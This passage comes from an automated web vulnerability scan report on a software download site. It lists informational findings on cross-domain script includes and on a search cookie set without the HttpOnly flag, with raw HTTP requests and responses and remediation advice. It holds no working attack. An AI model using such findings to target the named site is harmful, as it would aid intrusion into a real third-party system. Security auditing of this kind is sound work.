5.159. http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/usenext-download-rizftkeg.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:15 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.160. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-ivzgszuq.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:36 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.161. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-sqifmyiy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:09 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.162. http://www.x64bitdownload.com/software-advanced.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.163. http://www.x64bitdownload.com/submit-pad-file.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/submit-pad-file.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.164. http://www.x64bitdownload.com/tellafriend.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.165. http://www.x64bitdownload.com/top-software-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 140029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

6. Cookie without HttpOnly flag set previous next
There are 115 instances of this issue:

/64-bit-archive-downloads.html
/64-bit-assembling-downloads.html
/64-bit-atom-downloads.html
/64-bit-audio-downloads.html
/64-bit-automatic-downloads.html
/64-bit-autoposter-downloads.html
/64-bit-binaries-downloads.html
/64-bit-binary-downloader-downloads.html
/64-bit-binary-downloads.html
/64-bit-board-downloads.html
/64-bit-boards-downloads.html
/64-bit-client-downloads.html
/64-bit-commander-downloads.html
/64-bit-community-downloads.html
/64-bit-complex-downloads.html
/64-bit-conference-downloads.html
/64-bit-cross-downloads.html
/64-bit-download-downloads.html
/64-bit-downloader-downloads.html
/64-bit-explorer-downloads.html
/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html
/64-bit-fast-download-downloads.html
/64-bit-feed-downloads.html
/64-bit-feedreader-downloads.html
/64-bit-file-grabber-downloads.html
/64-bit-file-sharing-downloads.html
/64-bit-firefox-downloads.html
/64-bit-forum-c-44-newsgroup-clients-downloads.html
/64-bit-forum-downloads.html
/64-bit-forums-downloads.html
/64-bit-google-groups-downloads.html
/64-bit-grabber-downloads.html
/64-bit-group-downloads.html
/64-bit-groups-downloads.html
/64-bit-highspeed-connection-downloads.html
/64-bit-image-grabber-downloads.html
/64-bit-images-downloads.html
/64-bit-internet-c-44-newsgroup-clients-downloads.html
/64-bit-internet-downloads.html
/64-bit-kill-file-downloads.html
/64-bit-killfile-downloads.html
/64-bit-mp3-downloads.html
/64-bit-multimedia-downloads.html
/64-bit-multipart-downloads.html
/64-bit-news-c-44-newsgroup-clients-downloads.html
/64-bit-news-downloads.html
/64-bit-news-reader-downloads.html
/64-bit-newsfeed-downloads.html
/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html
/64-bit-newsgroup-downloads.html
/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html
/64-bit-newsgroups-downloads.html
/64-bit-newsreader-c-44-newsgroup-clients-downloads.html
/64-bit-newsreader-downloads.html
/64-bit-nntp-c-44-newsgroup-clients-downloads.html
/64-bit-nntp-downloads.html
/64-bit-nzb-downloads.html
/64-bit-ozum-downloads.html
/64-bit-par-downloads.html
/64-bit-podcast-downloads.html
/64-bit-posts-downloads.html
/64-bit-rar-downloads.html
/64-bit-reader-c-44-newsgroup-clients-downloads.html
/64-bit-reader-downloads.html
/64-bit-reading-downloads.html
/64-bit-rss-c-44-newsgroup-clients-downloads.html
/64-bit-rss-client-downloads.html
/64-bit-rss-downloads.html
/64-bit-rss-feed-reader-downloads.html
/64-bit-rss-reader-downloads.html
/64-bit-search-downloads.html
/64-bit-ssl-downloads.html
/64-bit-synchronization-downloads.html
/64-bit-synchronize-downloads.html
/64-bit-topic-downloads.html
/64-bit-troll-downloads.html
/64-bit-troll-killer-downloads.html
/64-bit-trollkiller-downloads.html
/64-bit-use-next-downloads.html
/64-bit-usenet-c-44-newsgroup-clients-downloads.html
/64-bit-usenet-downloads.html
/64-bit-usenet-search-engine-downloads.html
/64-bit-usenext-downloads.html
/64-bit-video-downloads.html
/64-bit-xpat-downloads.html
/64-bit-yenc-downloads.html
/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html
/categories/free-64-bit-business-downloads-2-0-d.html
/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html
/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html
/categories/free-64-bit-communications-downloads-3-0-d.html
/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html
/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html
/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html
/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html
/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html
/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html
/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html
/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html
/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html
/categories/free-64-bit-desktop-downloads-4-0-d.html
/categories/free-64-bit-development-downloads-5-0-d.html
/categories/free-64-bit-education-downloads-6-0-d.html
/categories/free-64-bit-games-entertainment-downloads-7-0-d.html
/categories/free-64-bit-graphic-apps-downloads-8-0-d.html
/categories/free-64-bit-home-hobby-downloads-9-0-d.html
/categories/free-64-bit-multimedia-design-downloads-258-0-d.html
/categories/free-64-bit-network-internet-downloads-10-0-d.html
/categories/free-64-bit-security-privacy-downloads-11-0-d.html
/categories/free-64-bit-servers-downloads-12-0-d.html
/categories/free-64-bit-system-utilities-downloads-13-0-d.html
/categories/free-64-bit-web-development-downloads-14-0-d.html
/categories/free-64-bit-widgets-downloads-304-0-d.html
/downloads/t-64-bit-ozum-download-lhtivuds.html
/drivers/64-bit-vista-drivers.html

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

6.1. http://www.x64bitdownload.com/64-bit-archive-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-archive-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.2. http://www.x64bitdownload.com/64-bit-assembling-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.3. http://www.x64bitdownload.com/64-bit-atom-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.4. http://www.x64bitdownload.com/64-bit-audio-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.5. http://www.x64bitdownload.com/64-bit-automatic-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.6. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.7. http://www.x64bitdownload.com/64-bit-binaries-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.8. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.9. http://www.x64bitdownload.com/64-bit-binary-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.10. http://www.x64bitdownload.com/64-bit-board-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.11. http://www.x64bitdownload.com/64-bit-boards-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.12. http://www.x64bitdownload.com/64-bit-client-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.13. http://www.x64bitdownload.com/64-bit-commander-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-commander-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.14. http://www.x64bitdownload.com/64-bit-community-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-community-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.15. http://www.x64bitdownload.com/64-bit-complex-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-complex-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.16. http://www.x64bitdownload.com/64-bit-conference-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.17. http://www.x64bitdownload.com/64-bit-cross-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.18. http://www.x64bitdownload.com/64-bit-download-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.19. http://www.x64bitdownload.com/64-bit-downloader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.20. http://www.x64bitdownload.com/64-bit-explorer-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-explorer-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

